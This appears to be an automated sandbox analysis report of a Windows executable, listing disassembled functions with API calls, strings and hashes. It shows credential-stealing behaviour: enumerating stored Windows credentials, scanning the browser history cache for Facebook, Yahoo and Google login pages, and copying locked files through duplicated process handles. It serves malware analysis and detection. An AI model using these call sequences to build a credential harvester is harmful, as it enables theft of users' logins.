                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                  • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                  • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                  • String ID: bhv
                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                  • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                  • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                  Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                  • API String ID: 2941347001-70141382
                                                                                                                  • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                  • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                  • String ID: visited:
                                                                                                                  • API String ID: 2470578098-1702587658
                                                                                                                  • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                  • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1f3 call 406e8f 726->729 732 40e1f8-40e1fa 729->732 733 40e270-40e27d call 406b53 732->733 734 40e1fc-40e219 call 40dd50 * 2 732->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                  • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                  • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                  Function 0040BDB0 Relevance: 13.7, APIs: 9, Instructions: 151COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 770 40bdb0-40bdce call 404363 773 40bf63-40bf6f call 40440c 770->773 774 40bdd4-40bddd 770->774 775 40bdee 774->775 776 40bddf-40bdec CredEnumerateW 774->776 778 40bdf0-40bdf2 775->778 776->778 778->773 780 40bdf8-40be18 call 40b2cc wcslen 778->780 783 40bf5d-40bf60 LocalFree 780->783 784 40be1e-40be20 780->784 783->773 784->783 785 40be26-40be42 wcsncmp 784->785 786 40be48-40be77 call 40bd5d call 404423 785->786 787 40bf4e-40bf57 785->787 786->787 792 40be7d-40bea3 memset 786->792 787->783 787->784 793 40bea5 792->793 794 40bea7-40beea memcpy 792->794 793->794 795 40bf11-40bf2d wcschr 794->795 796 40beec-40bf06 call 40b2cc _wcsnicmp 794->796 798 40bf38-40bf48 LocalFree 795->798 799 40bf2f-40bf35 795->799 796->795 801 40bf08-40bf0e 796->801 798->787 799->798 801->795
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                  • LocalFree.KERNELBASE(?,00000214,?,00000000,?), ref: 0040BF60
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FreeLocal$CredEnumerate_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1564206659-0
                                                                                                                  • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                  • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                  • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                  • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                  Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 855 41837f-4183bf 856 4183c1-4183cc call 418197 855->856 857 4183dc-4183ec call 418160 855->857 862 4183d2-4183d8 856->862 863 418517-41851d 856->863 864 4183f6-41840b 857->864 865 4183ee-4183f1 857->865 862->857 866 418417-418423 864->866 867 41840d-418415 864->867 865->863 868 418427-418442 call 41739b 866->868 867->868 871 418444-41845d CreateFileW 868->871 872 41845f-418475 CreateFileA 868->872 873 418477-41847c 871->873 872->873 874 4184c2-4184c7 873->874 875 41847e-418495 GetLastError free 873->875 878 4184d5-418501 memset call 418758 874->878 879 4184c9-4184d3 874->879 876 4184b5-4184c0 call 444706 875->876 877 418497-4184b3 call 41837f 875->877 876->863 877->863 883 418506-418515 free 878->883 879->878 883->863
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                  • String ID: |A
                                                                                                                  • API String ID: 77810686-1717621600
                                                                                                                  • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                  • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                  • String ID: r!A
                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                  • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                  • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                  • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                  • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                  Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                                  • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID: C:\Windows\system32
                                                                                                                  • API String ID: 669240632-2896066436
                                                                                                                  • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                  • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
